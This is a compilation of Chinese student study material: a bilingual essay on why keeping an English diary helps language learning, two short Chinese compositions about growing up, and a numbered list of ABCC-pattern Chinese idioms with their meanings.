记英语日记是提高我们英语水平的一个有效途径。记英语日记可以锻炼我们用英语思维来思考,为我们更好地理解和使用英语单词,短语和习语提供了一个机会,同时记英语日记也是提高我们写作技巧的好方法。
In the first place, to keep a diary in English, we need to think in English. As Chinese students, we are used to thinking in our traditional way and it is quite difficult to change our way of thinking. Keeping a dairy can help us find the difference between the ways of thinking in Chinese and in English, understand the basic way of English thinking and finally use it in our composition. And if we understand the way of thinking in English, we will be easier to learn English well.
首先,要记英语日记,我们需要用英语思维来思考。作为中国学生,我们习惯了传统的思维方式,要转变是很困难的。记英语日记可以帮助我们找出汉语思维和英语思维之间的区别,帮助我们理解英语思维的基本方法,最后运用于我们的写作中。如果我们理解了英语的思维方法,我们就更容易学好英语。
Second, to keep a diary in English, we need to master the certain number of English vocabulary, phrases, idioms and the culture of English country. Therefore, the process of keeping a diary is also a process of learning and understanding English.
第二,要记英语日记,我们需要掌握一定数量的英语单词,短语,习语和英语国家的文化。因此,记日记的过程也是学习和理解英语的过程。
Third, keeping a diary in English is a good way to improve our English writing skills. Through keeping a diary, we can accumulate the certain number of English knowledge and use them flexibly. Over a long period, we will find that our level of writing have been improved a lot.
第三,记英语日记是提高我们的写作技巧的好方法。通过记日记,我们可以积累一定数量的英语知识,能够灵活地运用它们。长期之后,我们会发现我们的写作水平有大进步。
In a word, keeping a diary in English is helpful to improve our level of English.
总之,记英语日记有助于提高我们的英语水平。
篇13:关于成长日记式作文600字
棒棒糖是那样的甜,你可知道,怎么吃它最有滋味吗?也不知你的答案是什么,反正,在我的记忆里啊,含着泪啃棒棒糖是最有滋味的。
苦涩涩
在我很小的时候,上学、放学就没了爸、妈的接送,只得独自一人走上一大段路,很是累人。直到有那么一天,一个同学告诉我:我每天走的那条路旁边有一条小道走回家很近。我正好一直以来都不想走那么远的路,这正合我意啊!为了这条捷径,我特地买了根棒棒糖来庆祝。
于是乎,啃着棒棒糖我就上路了。事情可没有预料的那么圆满:第一,迷路了;第二,由于到处是泥泞,进退二难。我一下子精神崩溃了,啜泣起来。口里的糖还泛着甜味,可心里却又苦又涩。
甜滋滋
5月13日,是我终身难忘的一天,我真正的见到了我自己的偶像。那晚8:00,群星演唱会就开始了,一大堆我不喜欢的明星上台折磨了我2个小时后,就在我没耐性打开棒棒糖之际,我的偶像——周杰伦,终于闪亮登场了,伴着《黑色毛衣》的旋律上台了。看着他,我不免百感交集哭了出来。我没有理会爸爸的不解,只是一直哭,直到他把《双截棍》、《霍元甲》、《乱舞春秋》唱完。钟爱的棒棒糖,远没有那歌的滋味。
酸溜溜
爸爸那天不能送我,就叫我独自搭公交车去学校,他说凡是路过阅马场的公交车都不能坐,因为这种公交车在钟家村铁桥下停,到校要多走十分钟的路。在我打开一支棒棒糖的时候,来了一辆符合爸爸“要求”的公交车,立马坐上去,谁知它不按爸爸的“指示”,开到钟家村铁桥下就到站了。害得我一路狂奔到校,心里酸酸的。
棒棒糖依旧那么甜,我的成长伴随着这甜美,在我心里留下深深的印记,就像海浪冲击岸边遗落的贝壳那样美丽。
篇14:关于成长日记式作文600字
在我成长的道路上,有许多有意义的事,其中就有这么些事,一直让我不能忘怀。
记得那次运动会上,我报名了男子五百米跑步。比赛开始了,我跑在最前面,我就觉得自己是最棒的,不会有人能超过自己,我得意洋洋。突然,一不小心我被摔倒了,钻心的疼痛使我无法站起来。就在这时,我发现了的老师,她用鼓励的目光看着我,好像在说:站起来,你是好样的。老师的目光,像甘甜的露水滋润了我的心田。我信心倍增,我猛地站起来又继续向前跑去。到了第二圈,我已是筋疲力尽了,而且还掉在别人后面,我就想放弃。一旁的老师好像看穿了我的心事,大声喊起来:“加油!加油!”老师的声音,给了我巨大的力量,我鼓足勇气,坚持着跑到了终点。虽然我是最后一个到达终点的,但老师还是向我竖起了大拇指。
还有一次,是在一节数学课堂里,老师布置了几道题让我们自己做。不一会儿,老师喊起了我的名字,让我上讲台给全班同学讲第一道题。我想,我不善于言辞,老师这不是在大庭广众之下给我出丑吗?但老师的话,不得不听从,我只好硬着头皮走到讲台上。全班五十六双眼睛盯着我,此时的我简直就像热锅上的蚂蚁。我吞吞吐吐地讲了起来,可是,由于紧张,我说话的声音恐怕连我自己都难以听见。看到我紧张的样子,老师向我送来了鼓励的目光,还大声地说:“别紧张,你能行!”有了老师的鼓励,我信心十足,声音也高了。题讲完了,教室里响起了掌声,那掌声竟然是老师第一个鼓起来的,顿时,我心里有了说不出的激动。那以后,我胆子也大起来了,我的成绩也慢慢好起来了。
虽这两件事都是小事,但在我记忆的深处始终难以抹去,因为它是我成长的足迹,而且在我成长的历程中记录了老师给我的鼓励,这鼓励那么深厚,那么伟大,使我永远难忘……
篇15:哪些词语是abcc式的
哪些词语是abcc式的
一、议论纷纷 形容意见不一,议论很多。
二、言之凿凿 凿凿:确实。形容说得非常确实。
三、文质彬彬 文:文采;质:实质;彬彬:形容配合适当。原形容人既文雅又朴实,后形容人文雅有礼貌。
四、天网恢恢 天网:天道之网;恢恢:宽广的样子。指天道如大网,坏人是逃不过这个网的,作恶必受到惩罚。
五、威风凛凛 威风:威严的气概;凛凛:严肃,可敬畏的样子。形容声势或气派使人敬畏。
六、众目睽睽 睽睽:张目注视的样子。许多人争着眼睛看着。指在广大群众注视之下。
七、风尘仆仆 风尘:指行旅,含有辛苦之意;仆仆:行路劳累的样子。形容旅途奔波,忙碌劳累。
八、薄暮冥冥 傍晚时天气昏暗。
九、大才盘盘 盘盘:形容大的样子。指有大才干的人。
十、独行踽踽 孤零零地一个人走路。
十一、虎视耽耽 象老虎那样凶狠地盯着。
十二、情意绵绵 情意:对人的感情。绵绵:延续不断的样子。形容情意深长,不能解脱。
十三、铁中铮铮 铮铮:金属器皿相碰的声音。比喻才能出众的人。
十四、兴致勃勃 兴致:兴趣;勃勃:旺盛的样子。形容兴头很足。
十五、风雨凄凄 凄凄:寒冷。风雨交加,清冷凄凉。
十六、俯仰唯唯 唯唯:答应的声音。点头答应。比喻谦卑地应付。
十七、无所事事 事事:前一“事”为动词,做;后一“事”为名词,事情。闲着什么事都不干。
十八、大腹便便 便便:肥胖的样子。形容肥胖的样子。
十九、庸中佼佼 佼佼:美好。指平常人中特别出众的
二十、来势汹汹 动作或事物到来的气势很厉害。
二十一、路远迢迢 形容路途遥远。
二十二、热气腾腾 热气蒸腾的样子。形容气氛热烈或情绪高涨。
二十三、死气沉沉 形容气氛不活泼。也形容人精神消沉,不振作。
二十四、天下汹汹 汹汹:喧扰。形容局势动荡,群情喧扰。
二十五、含情脉脉 饱含温情,默默地用眼神表达自己的感情。常用以形容少女面对意中人稍带娇羞但又无限关切的表情。
二十六、人心惶惶 惶惶:也作“皇皇”,惊惶不安的样子。人们心中惊惶不安。
二十七、关情脉脉 关情:关切的情怀。脉脉:情意深长。形容眼神中表露的意味深长的绵绵情怀。亦作“脉脉含情”。
二十八、喜气洋洋 洋洋:得意的样子。充满了欢喜的神色或气氛。
二十九、言之谆谆,听之藐藐 说的人很诚恳,听的人却不放在心上。
三十、英姿勃勃 英俊而富有朝气的样子。
三十一、小时了了 指人不能因为少年时聪明而断定他日后定有作为。
三十二、血泪斑斑 血与泪俱在实证物。
三十三、血债累累 血债:未报的杀人深仇;累累:形容很多。指杀人很多,罪恶极大。
三十四、人言籍籍 指人们议论纷纷。
三十五、空腹便便 便便:肥胖的样子。比喻并无真才实学。
三十六、大名鼎鼎 鼎鼎:盛大的样子。形容名气很大。
三十七、忧心悄悄 忧虑不安的样子。
三十八、苦海茫茫 苦海:苦难深重如海;茫茫:辽阔深远的样子。无穷无尽的苦难。
三十九、人才济济 济济:众多的样子。形容有才能的人很多。
四十、言笑晏晏 说说笑笑,和柔温顺。
四十一、剑戟森森 比喻人心机多,很厉害。
四十二、人言藉藉 籍籍:纷乱的样子。人们指责、攻击的话哪里都流传着。多用在说有关人家名誉的事。
四十三、钉头磷磷 建筑物上一颗颗的钉头光彩耀眼。
四十四、中心摇摇 中心:心中;摇摇:心神不安。形容心神恍惚,难以自持。
四十五、衣冠楚楚 楚楚:鲜明、整洁的样子。衣帽穿戴得很整齐,很漂亮。
四十六、妙手空空 指小偷,也形容手中一无所有。
四十七、大才槃槃 槃槃:形容大的样子。指有大才干的人。
四十八、书声朗朗 形容读书声音清朗而响亮。
四十九、心旌摇摇 心神不定,情思起伏,就像旌旗随风飘摇一样。
五十、波光鳞鳞 形容波光像鱼鳞一样层层排列。
五十一、万里迢迢 形容路程很遥远
五十二、磨刀霍霍 现多形容敌人在行动前频繁活动。
五十三、忠心耿耿 耿耿:忠诚的样子。形容非常忠诚。
五十四、雄心勃勃 勃勃:旺盛的样子。形容雄心很大,很有理想。
五十五、泪眼汪汪 汪汪:满眼泪水的样子。两眼充满泪水。
五十六、小心翼翼 翼翼:严肃谨慎。本是严肃恭敬的意思。现形容谨慎小心,一点不敢疏忽。
五十七、两手空空 形容人手头很紧,一个钱也没有。
五十八、千里迢迢 迢迢:遥远。形容路途遥远。
五十九、怒气冲冲 盛怒的.样子。
六十、不甚了了 甚:很;了了:明白。不很明白,不很懂。
六十一、万目睽睽 睽睽:张目注视的样子。在众人的注视、监督下。
六十二、天网恢恢,疏而不漏 意思是天道公平,作恶就要受惩罚,它看起来似乎很不周密,但最终不会放过一个坏人。比喻作恶的人逃脱不了国法的惩处。
六十三、行色匆匆 行色:出发前后的神态。行走或出发前后的神态举止急急忙忙的样子。
六十四、童山濯濯 没有树木,光秃秃的山。
六十五、信誓旦旦 信誓:表示诚意的誓言;旦旦:诚恳的样子。誓言说得真实可信。
六十六、铁板钉钉 ①犹言硬碰硬。比喻说话办事坚决、干脆。②比喻已成定论。
六十七、顾虑重重 重重:一层又一层。一层又一层的顾虑。形容顾虑极多,难于放手行事。
六十八、傲骨嶙嶙 傲骨:指高傲不屈的性格。嶙嶙:山崖突兀貌。比喻高傲不屈。
六十九、得意洋洋 洋洋:得意的样子。形容称心如意、沾沾自喜的样子。
七十、余子碌碌 余子:其他的人。指其他人平庸无能,表示对别人的轻视。
七十一、丰度翩翩 丰度:风采气度。翩翩:洒脱的样子。形容神态举止文雅优美,超逸洒脱。同“风度翩翩”。
七十二、白发苍苍 苍苍:灰白色。头发灰白。形容人的苍老。
七十三、吉祥止止 第一个止字是留止的意思,第二个止字是助词。指喜庆。
七十四、神采奕奕 奕奕:精神焕发的样子。形容精神饱满,容光焕发。
七十五、气喘吁吁 形容呼吸急促,大声喘气。
七十六、秋水盈盈 形容眼神饱含感情。同“秋波盈盈”。
七十七、心事重重 心里挂着很多沉重的顾虑。
七十八、逃之夭夭 本意是形容桃花茂盛艳丽。后借用“逃之夭夭”表示逃跑,是诙谐的说法。
七十九、文质斌斌 原形容人既文雅又朴实,后形容人文雅有礼貌。同“文质彬彬”。
八十、瘦骨嶙嶙 形容人或动物消瘦露骨。
八十一、板上钉钉 比喻事情已经决定,不能改变。
八十二、人言啧啧 人们不满地议论纷纷。
八十三、众口嗷嗷 嗷嗷:哀号声。形容人们因饥饿而嗷嗷哀号。
八十四、暮气沉沉 暮气:黄昏时的烟霭;沉沉:低沉。形容精神萎靡不振,缺乏朝气。
八十五、饥肠辘辘 饥肠:饥饿的肚子;辘辘:车行声。肚子饿得咕咕直响。形容十分饥饿。
八十六、鸿飞冥冥 冥冥:遥空。大雁飞向远空。比喻远走避祸。
八十七、野心勃勃 勃勃:旺盛的样子。形容野心非常大。
八十八、杀气腾腾 杀气:凶恶的气势;腾腾:气势旺盛的样子。形容充满了要杀人的凶狠气势。
八十九、仪表堂堂 仪表:人的外表,风度;堂堂:仪容庄严大方的样子。形容人的容貌端正。
好善恶恶 崇尚美善,憎恨丑恶。
